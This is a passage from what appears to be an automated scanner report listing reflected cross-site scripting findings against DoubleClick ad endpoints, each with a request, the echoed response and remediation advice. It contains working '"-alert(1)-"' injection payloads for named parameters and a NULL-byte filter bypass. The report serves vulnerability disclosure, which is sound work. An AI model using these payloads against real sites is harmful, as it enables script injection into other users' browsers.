var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT59795"-alert(1)-"7c45a99b0fe&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/d%3B234266103%3B2-0%3B0%3B58044025%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp
...[SNIP]...

5.16. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %002096d"-alert(1)-"97b0dfdbd42 was submitted in the PG parameter. This input was echoed as 2096d"-alert(1)-"97b0dfdbd42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT%002096d"-alert(1)-"97b0dfdbd42&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6709
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:50:42 GMT
Expires: Sun, 30 Jan 2011 14:50:42 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
r FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT%002096d"-alert(1)-"97b0dfdbd42&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/df/%2a/z%3B234265784%3B1-0%3B0%3B58044025%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs%3D%3fhttp
...[SNIP]...

5.17. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d012"-alert(1)-"798e5f4187f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=374868852d012"-alert(1)-"798e5f4187f&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6678

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
50.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=374868852d012"-alert(1)-"798e5f4187f&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/d%3B234266103%3B2-0%3B0%3B58044025%3B4307-300/250%3B38529139/38546896/
...[SNIP]...

5.18. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2871"-alert(1)-"dd540de812e was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=Gc2871"-alert(1)-"dd540de812e&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6678

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=Gc2871"-alert(1)-"dd540de812e&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/250%3B
...[SNIP]...

5.19. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0029a66"-alert(1)-"0503257d38a was submitted in the destination parameter. This input was echoed as 29a66"-alert(1)-"0503257d38a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=%0029a66"-alert(1)-"0503257d38a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6690
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:28:15 GMT
Expires: Sun, 30 Jan 2011 19:28:15 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
cape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=%0029a66"-alert(1)-"0503257d38ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/df/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PL
...[SNIP]...

5.20. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a01ea"-alert(1)-"f73a2c9f20 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=a01ea"-alert(1)-"f73a2c9f20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6646
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:51:02 GMT
Expires: Sun, 30 Jan 2011 14:51:02 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=a01ea"-alert(1)-"f73a2c9f20http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/u%3B234266403%3B0-0%3B0%3B58044025%3B4307-300/250%3B38529133/38546890/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PL
...[SNIP]...

5.21. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42002"-alert(1)-"c30755c1247 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!42002"-alert(1)-"c30755c1247&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:48:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6510

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!42002"-alert(1)-"c30755c1247&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/n%3B234266403%3B1-0%3B0%3B5804402
...[SNIP]...

5.22. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a71d5"-alert(1)-"c72810b521d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334a71d5"-alert(1)-"c72810b521d&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6543

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334a71d5"-alert(1)-"c72810b521d&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/l%3B234280362%3B0-0%3B0%3B58044029%3B4307-300/250
...[SNIP]...

5.23. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b51a"-alert(1)-"6a635320be6 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=22476116b51a"-alert(1)-"6a635320be6&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6666

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ar minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=22476116b51a"-alert(1)-"6a635320be6&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/t%3B234282361%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs
...[SNIP]...

5.24. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6f6d"-alert(1)-"a0cc74f8d36 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987af6f6d"-alert(1)-"a0cc74f8d36&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6666

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987af6f6d"-alert(1)-"a0cc74f8d36&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.
...[SNIP]...

5.25. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed08d"-alert(1)-"738e3685fea was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSNed08d"-alert(1)-"738e3685fea&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6685

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSNed08d"-alert(1)-"738e3685fea&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/n%3B234280362%3B1-0%3B0%3B58044029%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs%3D%3fhttp
...[SNIP]...

5.26. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 683a3"-alert(1)-"726bafe38a0 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=683a3"-alert(1)-"726bafe38a0&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6511

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
is_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=683a3"-alert(1)-"726bafe38a0&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/l%3B234280362%3B0-0%3B0%3B58044029%3B4307-300/250%3B39750646/39768433/2%3
...[SNIP]...

5.27. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
